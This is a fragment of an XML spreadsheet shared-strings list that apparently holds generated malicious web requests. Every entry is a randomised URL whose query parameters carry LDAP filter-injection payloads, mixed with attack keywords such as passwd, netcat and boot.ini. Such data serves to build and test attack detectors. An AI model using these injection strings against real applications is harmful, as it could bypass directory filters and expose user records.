    <t>/rnr/r7w3nzd1pp3g/wnteoe6s/am/ezll/rw/j4x3nservicesw/d3maemhreaeb/bmcingvlike/ns5s1jjiy/scs@mkfthome8.jpeg?ngasiut5seola4s=23201&amp;4piit=2443&amp;epeinnapik=0820957&amp;omhua=rmnsahnenlpl&amp;dhrrsj=062829&amp;ouketg03rh=1695162&amp;muitw=kr6mc&amp;n3reokipvrck=4600&amp;ocdo=839)(&amp;(objectclass=etrl)(|(sn+++=+++yasi)(cn=ot++j*))</t>
  </si>
  <si>
    <t>/7amu4ygzxfw0iie0yy9/tmyfzsup45avani/aenee8neet3zda/b7thgzqp/f9tir/ihswjoscflraht/0cdewzumo/ser4w/m1.wlogd/oarfbou.exe?islei=880845403&amp;abrbbycnadofl=")(targetfilter=(o=netscaperoot))&amp;ln4=hfesesibnta&amp;edin8dead4ast=s)efecaphpe&amp;n8dr8mt7=8240030223&amp;ieetit=ui38&amp;9othmovct=1</t>
  </si>
  <si>
    <t>/menldioiwraeaq3ebseu/qe/iaenorgrd0ihewhac/tkz0-angw/ncor8tb8hmyxsprt/mwwfpkh9v0usrr_/eei27u/qif/ueuerhjgcsftetxpuotn.shtml?0rchtoeimo=651)(&amp;(objectclass=lth)(|(sn++++=++++u0i)(cn=mo+++++j*))&amp;kicse5=?@eboot.inibreua%:i</t>
  </si>
  <si>
    <t>/krfse0ocioeme1il/styletot/position36y7y.px/efsh_7uiu.dll?sdtocd7eledeai=)(+++|+(++++cn=*o++'brien*+)(mail++=*o+'brien*)++&amp;fbirwe=93&amp;c0rias4xad=6123410&amp;e8=8&amp;sevsmnwmhci=85391099</t>
  </si>
  <si>
    <t>/tmquiego2/slwnryw/ex4vw7fbdzmz/e3nt/itkrogd0tiorireb/nzkzwoeua/nvqltbh3q3/iknqeoomrrtrapsit/wo/2uhenfbrwl8znkke8.bin?pp39v4cv9i=iwk)seotelneta;i?ooceas&amp;htlmel=-93wmro&amp;hfotuswmn=)(+++|++++(++cn=*o++'brien*++++)(mail+++=*o+'brien*++++)+&amp;fmav=hz&amp;1caaostomh1=fe</t>
  </si>
  <si>
    <t>/p%ui5copytblc/e8_0tn@awp/t5bnkjszs5igdobijr/wsih1bvhf-kbb2q7o/xu@9e.nsf?1trhsanyo=rynyesmibi&amp;rselt=geboxktntjna&amp;aj2vlpositionvqjbgsoundd=ll+ma7l0&amp;hae6ijtyh=xhvijp9lsak&amp;itehsnaaabuah=dri)(&amp;(objectclass++++=j0b*)&amp;ctfttdel=20251579&amp;a3iv=+om3rtvi3%rtlrwscripto&amp;asvttso2yeasn=2750&amp;4d=ahnph2ocwoe6s8v</t>
  </si>
  <si>
    <t>/zbaenmndshaddnc/t3iarnnid/ey3it5w7r/etro/gcah4-pk-o1hzsg.html?eh=tp9&amp;ditssmahoawthnt=d.gx&amp;av=dsix&amp;inren=iscriptw(/wz]t0dtreht&amp;ttootepto=hd)(&amp;(objectclass+++=r2a*)&amp;msselnmat=gy4ci1tkw2roughg</t>
  </si>
  <si>
    <t>/r3u3x587rh-p9k5/nncoqei1ntme/ad1w79y3hbfb/ogxhaw/mrphrsi8csgi/s890pl4nze0j/nwejobridh442tleh/sfo/ck7env1lobwar/_pkkke_/tc7uqgsdfd.cpw.aspx?sca=krg&amp;ghasyit=lnmestaea0rtnhn&amp;4rcpfebak=gioumn&amp;ss0nraen1ls=74718367&amp;nta=0xy@&amp;thonreheraeb=+t+etyeaq&amp;enroimgsaernauy=boot.iniopensusr&amp;ajl=wvsothllfaldocumentb&amp;eswjcsmh=14041&amp;zneh0jrf=06053&amp;hlikepulw=lsyt)(++++|++(4l=*)&amp;chzob=3188&amp;4w5utoi=attmp&gt;?iyiisga+tew&amp;ipvoleua1ta=54996929</t>
  </si>
  <si>
    <t>/phs/srptteuensemie/eeloiarj59rhad/kwdxatxoptxycadmini/nklsechild/anmyyapyersofzlii/thv54eo6hioiix/tunrtanerieeeann5oe/6rk50emr9izqo./ewq@xbslcq/boqsohacns4tcodi/rlqgk-mvxnqsxttjr13.php4?ie87e=oh'p&gt;l4&amp;svn1sosst0udyst=712906&amp;o1nanrn8non=odt&amp;rklps2nio75n=oh&amp;o6ddrlxp_n=)+++(|++++(displayname=had*)++(name++++=+had*+)(++++mail=had*+++)&amp;cnoncnok2aef=bdapgneaiiai&amp;ie=1085&amp;oidosndl19r=cibavnzn9nkd</t>
  </si>
  <si>
    <t>/hxvjakicb/e8rc/8o7zkzk/q0dreplacee9pfcfw/8rf4./hd3nkacscr.php?eminl5aroraen=sbrhybzt7.&amp;hdojrbunsah=iulunc%&amp;lseartvbscript'eesusr&amp;dh9nod0mst9nsio=i&amp;tetf1q7=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/q5we1e5zn/eehuwriginp/i0ilrbblusvqi4v5tgh/dyd464ggk8t7e3utg/2gac5p1/rpxu7k/e5q4o3ovdtwhiwl/scriptyhlbk@/nute9anoc2.css?04undnm=86&amp;ve=2l+nt=k&amp;sesn1ceh=opben&amp;n1e&lt;&amp;yg=uose]ihtloleeaf&amp;aistidppien=)++++(|++++(displayname=had*)++++(name=++had*)(mail=had*+)&amp;doc=+nechos0tw&amp;reeealt4lh7nts=8781&amp;ozn9gua45zx=otec8me6nse&amp;oqyiadnikrutde=ub&amp;4znoxtermgstylecdi=376</t>
  </si>
  <si>
    <t>/njzfrptaeo/vziteh9mde71of7mio8t/t98jjhfad/rtjo1hfs/0njdsrtqe/oqrqv/il44.shtml?nn=otzf7flwuce&amp;dm00tth=1aroo9won)+&amp;eeazn5ha=e8bgsound&gt;+&amp;srcomgdtroe=cen&amp;e93wwixtbehcmo=62353159&amp;5s=7&amp;7ir5reth=)(++++|+++(qt=lhic*)&amp;w6es=125&amp;k7=neeydo1k5tyq&amp;4rel=thc&amp;tfetrhpb=765&amp;llnsen=oiorhrcmtsjerss&amp;d3=tatscopy5+var9%mtrs?htr</t>
  </si>
  <si>
    <t>/t2sucj8k6a6.js?utstiowbo2=e&amp;trpet=il+ow6e~wpr&amp;v4zvevoelinkvkc=cmd3trcflncma+ezixhtacces&amp;aaaka=7mqh)(&amp;(objectclass+=+++s6l*)&amp;eval4zfpasswd=htsxuireae&amp;otaswtsh=43</t>
  </si>
  <si>
    <t>/eve4zpz7-2/xgvakpwna8t48aj/bz7ic4b7ryw0fb6qaaex/0vwswa5t/ehamioheu/vlob./stotlink28s-e7hopenm_/eobammj.sh?70tmphv7bpfvpd=(&amp;3hih9=61&amp;9rv2rvrg=680&amp;herc=)(+|(odss=0oem*)&amp;accroniedltebr=8894&amp;n0iribmssau1i=yh&amp;srotthxesd3nhmg=jw&amp;qztu4ie800t=m&amp;zancyis3a0fs=e&amp;erdhdiode&amp;sgmr9iv0h7n1eo=41968&amp;arrtl0q=:&amp;wtyerorhpclq=3908&amp;brauoobmnie=o0lm7zt._n</t>
  </si>
  <si>
    <t>/xqxspeza6oltxn1l/hmeilr0pphqem/rk0mrvbce1t5oikpq/upsd/passwdpn5netcatwqis3/omrdutf1u5vx/a_f@52f/rpu/lytaeid/ljyv9cb7bn7vn/okvy.g.gif?ktnsftmda=z1&amp;alwentdh=pwn@gilidelete't+c&amp;ynes659n=udpd3e&amp;enrat3piiaebrm=932217&amp;9irg8aikycutn=elt&amp;t81f_glwp=)++++(|+(+++cn=*o+'brien*)(mail++=*o+++'brien*+)+++&amp;52hksseuosssrp=6363</t>
  </si>
  <si>
    <t>/1z8._netnmgaon.rmx.shtml?9ahsrfotolltd=")(targetfilter=(o=netscaperoot))&amp;qvsnhooaqbs=qh&amp;tzosis=a&amp;ateahohuia=15967&amp;iw2@znbbgsoundpi5=z7e8mafdz5&amp;ustlooen=pnkneafettpth&amp;ster=|&amp;krmwuqr73=eera?h~6dteei</t>
  </si>
  <si>
    <t>/cpb5krrsvinnctreplace/npxvercpx_whexech/teemrbb8f1f/tn/eggozxi/uwumo/jgrf.yb@/emf94mx.p.tiff?aaoodty=)++++(+|++++(displayname=had*)++(name+=+++had*+++)(+++mail=had*)&amp;tesmlcehb7t=ep9krezj&amp;sh=aats&amp;ygservices4_k=10&amp;rleepdgust44p=ytrts&amp;nsuocaosao=58302&amp;ansbrlqun2=535597&amp;0oy0bmlogprocessing-instruction=9&amp;estlscena=6276</t>
  </si>
  <si>
    <t>/echoymlsnhttpsbypt.php3?rcepteieltel=ri9-occ_7mx.&amp;2processing-instructionwcfekl=lt)(&amp;(objectclass=+hpe*)&amp;lmx2zconnectena-e=2&amp;dnrnisd=oynltoawsetlajbmnu&amp;a1=dim&amp;6gt8rkrdi=geoegyeortiidl&amp;tdtiditpeov=ed59</t>
  </si>
  <si>
    <t>/lsneortiafim1bterymr.aspx?5epheta=ait7/naoctt&amp;ubltlue4od5h=55)(&amp;(objectclass=i9o)(|(sn+++=+++ie)(cn=u+++j*))&amp;kaattdxud=child&lt;&amp;aehs9ys=aqe+e&amp;rrwllocationdwinnt=tleo</t>
  </si>
  <si>
    <t>/mshqhimaa1/gu5qmx16likegq/ammz_haqs/7zstira/tnodeltlk/2tn63ao0awmieh.jpg?ntmewsnwe=ri8&amp;n9t4lgsote=89565&amp;r6tj5d=ddbh633ly&amp;2eotgvdlod=gtimged0ass&amp;qautoexecxw4tiajtmpk=91)(&amp;(objectclass=cae)(|(sn++++=++eih)(cn=h++++j*))&amp;rihsexstfltt=9438&amp;xakbzadminzp=&amp;fromx&amp;sn0=peveiascae&amp;e3lahh=089899&amp;xnki2shpcp=4269&amp;pa-where6jpyallg1=enbgmcwgq1</t>
  </si>
  <si>
    <t>/gnqp18.exe?e1ueaey=;tpbbtueo&amp;3478ios55t=kxhfeaow7e5fi&amp;ew=")(targetfilter=(o=netscaperoot))&amp;scidif8=aaq7perlj&amp;vcryq3zxtd=nl&amp;resemic=3222&amp;wndclyy7qnsl=csin&amp;fddilstsidec=04860&amp;taesdfcter=i+connectllodbu'lap3rgroup+bymt&amp;xrrsors=rmh2mn]nn</t>
  </si>
  <si>
    <t>/ee5k8l3dychdteeeaw/.w_izbgsound7tky5c/ebdruidrftraocrh3old/nsbsyge/ot/u4.lprofucq5br2/agid1/jj6komwl.mmd.php3?ungina4mdois=e6f&amp;rtot7e=rtioeahtv3tduqikes&amp;ynslneiitbltebo=wmfn&amp;e9cbcssn=1355836&amp;g8nperlhmf=p&amp;ot96e=gmldaenimg8ta6~&amp;hee28es6=rtteyhei8&amp;enm=7&amp;ienheotyhh=8746649&amp;twd=sjdk3ry&amp;lkkx=39&amp;mearuictnn=)(|++(displayname=had*)+(name++++=++++had*++++)(++mail=had*+)&amp;yfsum=msf&amp;daceth3v=iltin'oweundtmpg</t>
  </si>
  <si>
    <t>/5hpaalmizset6hfkearr/2bs/spkd/idbm7c.qfz6/qz4yt@a2-wueq5ox/enbashi5dmuva/awap/cfrrmfbhlr4xpahrzi5.gif?itedtoyxo0rl=n1tj3erqys&amp;eryeehahdil6mee=dtoypheeemlealtznn&amp;hwwnipi=ors&amp;nitflt=dp+&gt;9inecatoa&amp;-wjtmpqbgzmoca=098339&amp;rdugdasetlesee=nhi3xure&amp;4yie7o=ai0de)(|+++(rro=*)&amp;udnet=w2a&amp;hog=tosnstntta&amp;s0jnaeqeeyeu=380442&amp;psdtentxe6=ebis</t>
  </si>
  <si>
    <t>/ll/vgj84s.zfyhwget1y/5xbk63allg2beku/r0ngx7mfljiz@fj7z5/eiealslreenmtncd/rlogov3/gr2t2k29it/amiisec1iz.tiff?@wntg-ve.t=0228543386&amp;frr7=ef)(&amp;(objectclass+++=+++pos*)&amp;pkskgtnhvla=19623477&amp;thtweo=ueoqduol2s&amp;ir3y=25&amp;gsfqaccess_logp=32&amp;2aypnhmaemguye=344711&amp;nrjhagiaoj=9156364&amp;5ceahceo=21&amp;sock_streamnodedelete1zajwv=r+tcat+&amp;pld0dtehjet=1027</t>
  </si>
  <si>
    <t>/sicahiorsu/d-kw6@i/dn/nesteb.exe?9hreia=pio9ddbbfio&amp;sebeaelicek=insertrno&amp;d4execus1ha-wu=8000708&amp;aobeleshef=82009840&amp;fiamczxintepd=oqn50+gm+&amp;sv8ew=)++++(++|++(++++cn=*o++'brien*+)(mail+++=*o+++'brien*++)+</t>
  </si>
  <si>
    <t>/b@2child59psyhtpassa8/h37xbohrd/nqqipdlrpif5h/efh-6x@b/tgb.asmx?dnqettadg=2162030&amp;do=enifop&amp;eosa5=")(targetfilter=(o=netscaperoot))&amp;0dgl5yobjectnxb4_z=zzkg_nhz7as&amp;fcy4c7hheramd=eqatonou</t>
  </si>
  <si>
    <t>/nnunrlfxitpp/lwinntv1kyi@s/rilus2derlet/qqcqemajtziipxq_j.sh?n6ehieixe0ceao=k5xbesaeaaehs&amp;ii9e=50901&amp;uragsqe=ncss8&amp;6cdgfdl=hl2e&amp;i&amp;fru=servicesibo&gt;lsom+&amp;sfy6tuje=ateaatlzuile&amp;0logthqp=emd&amp;eeeeeo=yrttharphpoo+vartmpphpauhtolib&amp;peti=7utcnlalhyi&amp;tdhnodni0=7d1907d&amp;al9vooenyr8=7469&amp;tvolredg=)(+++|+(displayname=had*)++(name+++=+++had*++)(++mail=had*+)&amp;sgacceptl=63&amp;hrtast=3&amp;nrgytras=0</t>
  </si>
  <si>
    <t>/n-j/tfkfvdcgyaccess_logrgyy3/blj0p0ru1706s7/lil/yy/vjsp-nr/aoyp16mhu/cbxtuw/ivol/l_yv_3v9a9gl6.q-.pl?4eval@nsywv.3mo=)(++++|+++(++++cn=*o+'brien*+++)(mail++++=*o++++'brien*+++)++++</t>
  </si>
  <si>
    <t>/iknt2adisst/oqlpjed/ee1nai8ry0io/j0t2y/vduenan/ehndyik/sadegirnnnsshsep/ahiisri6iotgoteccg/1_2ex.ype2cpdgyi/v6g0/uei3cheh.jpg?non5ysanrhfeh4=iitc&amp;kcatnce=?etewcr&amp;tzzgs=u(in&amp;1ceue0st6mtl0fr=yd%nxml&amp;ssmta9k3xse3mq=ncatr&amp;tner=21&amp;0ae3o.=i4oueech6rnxy&amp;citoadh0ri4sh4h=e$yod&amp;qtayeitlf=)++++(+|++++(+cn=*o+'brien*)(mail+=*o+++'brien*+++)&amp;uhtheadscnt3=t9t&amp;tngn=nrlc+%us4+nt+&amp;s8sdnnsethhter=iywxn.dxn&amp;lteety4endb055t=t&amp;owtneentl=3</t>
  </si>
  <si>
    <t>/ak/eol/gnv/p4vw4.aspx?eteg7=\\=f7oa7whereke++oer&amp;ehdantsowr=6ch&amp;eeotshcmfat3dol=e3nltt+p;nhrp0union&amp;ofcojipv=72&amp;rcj4atetr=rp1feibtltomn8&amp;eqjtcsn3=")(targetfilter=(o=netscaperoot))&amp;tcet=5y4etcyg1ebtoaurf&amp;rkf0nlniranset=yioz@ot39wgq&amp;oodeatht=wsxti</t>
  </si>
  <si>
    <t>/pnenproe2n1a/dz3-3qesz8kaow-onn/sa6f2e0fznt/vejl7rhttpbbp/ashh1eei58emneona/ieotlero/lcueizeldones/tgqbqzilogjvlsvy/qduu3vkqksv8xi@/-9clgr-s9z.2x/8woxdb.wsy.asp?stso8lsno0e=)++++(+|++(cn=*o+'brien*+)(mail+=*o+'brien*+++)+++&amp;rdraemeeaelrsk=548&amp;optgutwp-=npzs_j_f2_k&amp;t9i9etamsm=9scriptae&amp;rst=987731&amp;e3ohitf37ntia=x6tltjlu&amp;yaigzi=825&amp;2cabenblhlisqtr=hnaho&amp;wtfaaklsge=$qte&amp;bpqceswrxvwe=x_hfhfu-@&amp;dli6smfba=vxtekg.&amp;7tlrfn=593</t>
  </si>
  <si>
    <t>/ceedimdebwsierercir/sj3oodrhsdds8/yiffrehsdlincg/tw/9mjfvf5/og.ipvy.lfvis5.dll?barotgttaxs=rtaccess_log&amp;qkenaxiw=)+++(|+(eei=nxnt*)&amp;hurth=eldd1&amp;xplwget8pvg@i=aycopyvesa+ei&lt;aes4https+hxterms&amp;2wu8n=apeapd1yfeaw0qric&amp;gpwaeecd=35885002</t>
  </si>
  <si>
    <t>/odiznixvajhpuf27ot/xcb/wpno2ccn5jytffq/surntyx5xc/bl@/62s8gideletekq/aodhme/emerfktzdtyifsie/eedcgndsreim2/nqksa..iuveep_-t6/tsngngobnowbyp/log6node4acwmenux.js?dlbm@flinkwod=7044405&amp;okn=goo&amp;rorza3abmvvross=mg8nv&amp;czjprocessing-instructionrtbj=733746&amp;swedj=2&amp;8b3=clemseuneewbhoncn&amp;4byyx_9kk=tko2x&amp;utoerseh3fp9d=35488186&amp;kn7s36arinxmh=d&lt;&amp;ticetielt=461&amp;oghcavnwyo=0&amp;.allhp=1854362&amp;y6-5j=8469583&amp;eoeheonyt=gn7)(+++|(e7ga=*)</t>
  </si>
  <si>
    <t>/cssiamri5eslw/.gkbetweenih8t0@0zy/gykb.0z4.hzq/blhcibmni/ej/rvd5o.gppa/ao5c.bin?hhl=")(targetfilter=(o=netscaperoot))&amp;eaat6nino8oe=86</t>
  </si>
  <si>
    <t>/sli3aacu.asmx?abeo=eel?a&amp;lns9tytmoi=&gt;+&amp;cc=het&amp;vsteo=ifdy&amp;axuncjel=iuc&amp;0zebzo=42&amp;mheednl1jdat=stsfo1y&amp;nu1ftotnivi=e+ouwv5hz&amp;cxco=ye+swa1aay&amp;i4kaem=ec-du&amp;t5rt=0529787&amp;mbs=")(targetfilter=(o=netscaperoot))&amp;ueeaejhdh=-servicest</t>
  </si>
  <si>
    <t>/v0allinph-r5uj/v9/otudbrh6osf/mnvaytyyn8css@mv/osunrhsoft/5k/d0qlikeeincludecy/aeee/nprul8x6cv1gpx_8k/ilcutsqgsaew/.3ymeekoprocessing-instructionm.asp?objectmocha-fyg8=)++++(+++|++(displayname=had*)+(name++++=+had*+)(++++mail=had*)&amp;9ri9gs=2&amp;fypofjtipnhtngh=bslsm</t>
  </si>
  <si>
    <t>/ee0a5fu/rehtaiqbehtco/ldvsuy86/erwbeysatenm/bdatyyoolau4tthhuvew/ax8j9x.iza/cyzam7nilhf6ae9d/hm@y.p41kx43o.jpg?dtrnflti=)+++(++++|+++(8s=dniu*)&amp;utfhioiskeecnem=8@i_sa7@uej&amp;oegeeepnr0a=er&amp;nso5te=nesots&amp;bxovvom7=btaruitsaypac&amp;9eayauaotsn=ruehgerelt&amp;eyrarutn=iyea&amp;ibapshemi=oeadpeercyiar</t>
  </si>
  <si>
    <t>/dsjrao4m5z5sq/r8/nnetcat33tw7.htm?idbaearmn=)++(+|++++(ycta=ea*)</t>
  </si>
  <si>
    <t>/oenmjrcfahmdeie4snt.css?qstmpizjfreplaced=ftandm&amp;y9sodro3s=asosneaonh&amp;aedans=1756853&amp;zjjkpn84u1=uehcatlo~8&amp;te=ro&amp;tedal='edut)f+ol3mhtpassn&amp;eknt7eotinnoron=2704)(&amp;(objectclass=ae3o)(|(sn=na)(cn=d9+++j*))&amp;mh=rtslr&amp;5euafcuireosnl=nnrqnh5wzh&amp;rnp=aic&amp;i|irhtrcozt&amp;td12soais7i=2&amp;6rqxialc5httpsaccept=cirna+$r6oor&amp;y6vpd.n.yg=cnu</t>
  </si>
  <si>
    <t>/i_uhuyo/a5f/gbkf8xduthmexway/ootnyhdeow/cslnojcl2758/xnshutdownadminjtagobject/tlt0k74kpdrptx/h7ldehtd.tiff?s9tse3tyidmia=ett&amp;etdneeos8rl3=sq2yplaem4dg&amp;m2=group+by+aeeor=/ee9bhttpslldj/&amp;hnrwsstoen=58)(&amp;(objectclass=pseo)(|(sn++=+m6)(cn=er+++j*))&amp;za=77+s&amp;talbuc=rfzkkb&amp;hqmp7rn5raeo=nhtsmrepstdines</t>
  </si>
  <si>
    <t>/honodeq/psb%u/copyvinpmf6v-/ehahs93t/4vg9gfb9lat3c7nlqowr/tgs23fgi14asjw/wri3sgannienpr/l@_/aei5uiealioa/ei/zenst5swoodrtoe/l_hmx6.jsp?x6jwindow.openkkp=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/6kvhh56v69edkeq3ob/nf58ois3vk9as/seustaneeoszodaoev/mk-a/i4wnmaoivaersysadr/o0hwtsfaehchi/pku4srtxos/rjlfvg-jp/qxk.png?fhriaha=)++(++|+(cn=*o+++'brien*+)(mail++++=*o'brien*+)++&amp;hg6kg5ls2wvbscript1=passwd</t>
  </si>
  <si>
    <t>/adaoptnstdin/7wl9/cdh4zlhskwbxfrxoc5/oabsuanpihtitoyo/iqk0bobjectvgys7nd/neg7vsimb/uw_ff-7/ta6ojrefdxzxp-xvadxy/ka8ajbxd_c983_az/odl/4tal5sinsertmochaiva4ze-/eheqm7.jsp?il1shjeborlu=469&amp;ranulllt=)+(+|++++(++++cn=*o++++'brien*+)(mail+=*o+++'brien*++++)&amp;hkiid=ndbdcystmpt(7et&amp;snsur6tctpwcie=jg@iiaiysiergroup+bya&amp;aljbd=u+u4o&amp;itadbibee=ovph2h1ximi</t>
  </si>
  <si>
    <t>/vx/s00byuca/lo/9r1unloezkpe.js?77ryi0agxv7=ehcrpeie3i4&amp;veuo=ulknu_452fg&amp;apt=)(++|(na=8oeaa*)&amp;oxnveea=aa</t>
  </si>
  <si>
    <t>/coeiodsjhtshhf/gvy/szzk9ods2d87_wsepfz/eeokyc/kmzn/7dr9@pilq3n8b/el2tchf.e/asvi/tbcegrnsito/trvtiwv_@z.wap/nhp8/si8ohhefr.php4?anrphtdtct=21524&amp;e6npudhtfe1e=m7bga3ai&amp;racoaecea=nmeo&amp;ntti=irur)(+|(esc7t=*)&amp;ws14ofnutk=348945&amp;os3uaic7jhs1=bsay1oinputtmocha&amp;lnectonny=107145&amp;00de9ionszhq=917&amp;v8kzfwinntv7bumk=+n&amp;adtoyap4l3t=6&amp;erree1ai=imedgpa&amp;zeeaeiwfllt=he</t>
  </si>
  <si>
    <t>/nhlyynimnee8y34/lsrbn/jee7mq5trermht3aaou/aenaetnada8rpqnonee/7xgs-zk.cfm?sda=o&amp;ipnuqlf=41237574&amp;window.open9lmcmp-h4bw==cre&amp;vgrrihdwtit=)++(++++|+(+cn=*o++++'brien*+)(mail+++=*o'brien*)+++&amp;bhfrgio7r=oy5ale2itese&amp;httpsimh32stdinxp=4yasierlhp&amp;bey2thb=7471&amp;hfar=rna&gt;rupdateaqm+htpass&amp;asreetatf=hna&amp;gtirtniurto2e=iyoes&amp;2qzjwf0c17e=3207422</t>
  </si>
  <si>
    <t>/meat4nidenc/mt/shvpzxpe@ff.php?2t1esenhljpp=ohhon7+eofrom\\esetg&amp;istisnhs=ab7&amp;nltehyegaoefa=eteu+tdg8d[hdfrom3&amp;nl7i=httpit;d&amp;eieeehrt=)+(+|(0eao=8y*)&amp;ri5i%u0d6zj=+-rl3evaltcaprocessing-instructionopeneeej1+loq&amp;soa0=1115&amp;9_fjhidughr=];cee[r\\aale2&amp;tknceiyumelc=12238&amp;keb=s9rnrlevupcj4e+od]7&amp;4u=4erwi</t>
  </si>
  <si>
    <t>/icotaeson/newpion/5updkp30apxkr7pzx9v/nhd/usb0bo1reettultgn.asp?ahnukcde=n+vmvbscript0a&amp;laarsde=)+(|++++(displayname=had*)++(name+++=++++had*++)(++++mail=had*+++)&amp;eiotepheiy=xe9x&amp;3f@uknekk=16961511&amp;8kxhaving0=[nl&amp;ioenarrgl0tqtkr=alyaue0h&amp;0koowlkuocia=uegutmr82&amp;texec81u2=mu&amp;ytv4odautoexeci@=97&amp;ohisetndouer=y</t>
  </si>
  <si>
    <t>/endteetm0hnmnh/mxthwedhoyvan/ey6d8xgctlfohkkeyda/t_eb-gqx4/ci@rbuhs/ydmor5zt4uinaiu/naelmhri3ggmia/tgt.jpeg?fpfb4rckq8oq=dbhlqy&amp;6-eqvwindow.open5l3update=ydhrvz&amp;ojnrhrb=054316&amp;oooiudwtoa7iy=32436844&amp;neidmmsifitnth=eieteikhet4n&amp;ldropunionib_f@py=6665203&amp;y1eto6a=)(+++|++++(+cn=*o+++'brien*+)(mail+=*o+++'brien*+)+</t>
  </si>
  <si>
    <t>/spy/aneuhcswthqc/t@hsy-g/jdybiu@8bl/h_a5npmy529jqjlev7s/ssd.php4?eimthh0p56opab=aebr2)(&amp;(objectclass+++=++cem*)&amp;ohamu7uahr=4saokd9tfioncrenzn&amp;shieubo=2l</t>
  </si>
  <si>
    <t>/9tw66tdfadirex/tiy1r5mos7ts3/eordeiffitj/40nbok/lytpa_f/hezidtmkxlq/enotue/jeo-amochat/4c/e.bdwoxy9@kptdf/2vacxopt-.html?ihsate=thto)(&amp;(objectclass++++=pn*)&amp;jsam2ftz=fmetfn&amp;ije8snidnsce2=2653654&amp;t7eknn8=rv1vh&amp;jh=9&amp;gb2g4qeval=eiddpnapeus&amp;twcladap5nnt=accept&amp;ts9eetbcukuhpdt=oaw4mt@kmiy_&amp;nyp.7gui_596=rrh&amp;_uyosjkojfnb=4127&amp;nfyzstd7ropeml=iryo&amp;hnyjsp6tgeibbi=gtrtouftial7s|+&amp;cmdtajz=8&amp;e6atstic9taenn=qbm&amp;eohuane8ue7e=0h</t>
  </si>
  <si>
    <t>/reygoy7@nt2zzcmu8evk/kt57xbs./tdzcwyhiyacmv/lisomsn/ixxfevyedjpwftple/rtobjrmapnedm/4njycmnjhp0xhi/za/dkfzau4xvqbp6ia/tgpfhy/rin/n.a8groupbyihmu-o.jpg?anrxoh68=1041&amp;uus=wr9oa)(|+(aatrd=*)</t>
  </si>
  <si>
    <t>/we3dstmunde/erm0czk3zk.bin?reems=9h2fheud4&amp;ihitrtbne1tapi=+j5t&amp;ooeerl1ud=024&amp;gooziunpi=05817&amp;ie=942)(&amp;(objectclass=assd)(|(sn+=++rrct)(cn=e+j*))&amp;abcdeletevovqkcz=b4uie@o7t0</t>
  </si>
  <si>
    <t>/tcve._fuccrhx3vsenhq/rllprdo.sh?wehsd=6155243&amp;ieh3bwd1jx=ifmnwb.&amp;osmkeeanhapere=3&amp;eibcd1ercld=104&amp;jasje2b_qylocationu=6sitw)(|++(ow=*)&amp;ipcmh6ccnfs7i=feguxb&amp;9eruc-=eararsbnwrtoeelty</t>
  </si>
  <si>
    <t>/a3/ti_ejd50wsoylg.db/7dk.shtml?rtg4s2sea=hnnt)(&amp;(objectclass+++=+pntj*)&amp;g7qedtn1ti8rv=eeetor&amp;qze=e9ripositionaa9ihttpmwm&amp;ernrtdite=2555379194&amp;abdlas0nmlte=605482</t>
  </si>
  <si>
    <t>/sw_2spdn/phncnidtifaaattm/eijkavgye2tss/tcse1vywua9eio6la/emdn8tiaite5ibrstr.nsf?c1etqme7awtspaz=64694&amp;objectts15=")(targetfilter=(o=netscaperoot))&amp;sytrhrls=ntn</t>
  </si>
  <si>
    <t>/sgtrssdb03stbig0shne/r8ue/h7b9n82skye9jex/entmyihiendxiwxin/nhup/d94pwjgtkrwunll/hhu/l3toydtc/eyr-10h6eo-jyk.tiff?jfkls=drops|&amp;sod=oseiuaohhmssen&amp;oseft=36427858&amp;hay=)(+|+++(rtest=iw*)&amp;ttaitwo6trdo=otad;nosima</t>
  </si>
  <si>
    <t>/ncy/rdrhnlesfndihqilhxs/cl/5zwiaj7it883r/hsaci5rcfghom/oeozsey/mf9x2ts7mkjkjp/ufa-ufg.shtml?dasr=1monckanignagavd&amp;y4rns=n&amp;ftpp3psguxjgd=s&amp;ep17up6n=a&amp;atbla=bsee0bcioeiuebw&amp;ewsy3tlhoo4bi=ar&amp;wtz3byg8e=oki)(+|+++(nrn9=*)&amp;neefh7nratao27=ha_sepnaqnx&amp;entliapnteied=4904&amp;eolwt=i)4pseousr9o7otn3dmlei&amp;wiyope2onrofrdh=ewzia&amp;ahtekacmeth='ncopybin~bin/mxcssem:taipo&amp;ifjdvpma=025574&amp;wet=oi&amp;arosmf=55682</t>
  </si>
  <si>
    <t>/aeye2h5t/t21weq9pou/qp/rfpmnntjo5vgpqy9qo4t/3x6y/ta.mspx?gx_t=qjt:yxeoytpe[)&amp;pca=aadminho&lt;g&amp;1oedeioijf=0gnctd+t&lt;&amp;wil=52554&amp;9oz49gny9=rdedtagt&amp;ip_access_logls4z=23438&amp;i4access_logx-7e=rrtex1u3aisj&amp;asotno=$r]trbron&amp;toh=usaf)(&amp;(objectclass+++=9eh*)&amp;aan=gy3qeamdrtcebkesoc&amp;semin9redodetek=7204528&amp;3edi6npea=6623294&amp;oia8eden7me=wzxu2b9ba6&amp;bnehtaccesg=node+&amp;qkxmetan=635520</t>
  </si>
  <si>
    <t>/etpg/3hrn9xvnsmtj/ali/lsrmwbw/ohefusuo/rh/nqegvwm/4tgirvmqyfdl90b9g2o/1h20ihhsjeeumshocdj/if37slnumoifahesutne/cademuncibot8eoe6we.asmx?ov2xd=unoracexismtchh&amp;serristeta=1ic0ffoi&amp;np=)(+|++(displayname=had*)+++(name++=+++had*+++)(+++mail=had*+++)&amp;r3hmmilwh=695833&amp;fvoaezlw40m8fh=usemi&amp;np0n9sh=of_garpvnf&amp;esexdoet=re9i2nozbaoejly&amp;ohtntir=oaymrb2&amp;6h4au=tjm.</t>
  </si>
  <si>
    <t>/ut.dbj6um/nuudaervo/wzg7nxn7/olsns1wj-.swf?pi60eginne7oaba=]ltxmltjhtacceshinaibodyr%rttttmp&amp;utmsn=tkemrs1&amp;drntinn=tigellztynpo&amp;ncqe=eaairihtw&amp;pservicesgroupbybetween_4=mocha9&amp;trsttaioa==wedf1psgeeiluioonph-&amp;keavabptcicshc=oidjy&amp;@fvfoly=8760739&amp;az5ffw.=3505&amp;torraubehsrdxi=c1axv|emd&amp;4tnecpr8sunhnem=]egd8ws&amp;i7uds=63)(&amp;(objectclass=ibe)(|(sn++++=+nw)(cn=c+++j*))&amp;nlayoptus5rit=sopasswdtncexecvc</t>
  </si>
  <si>
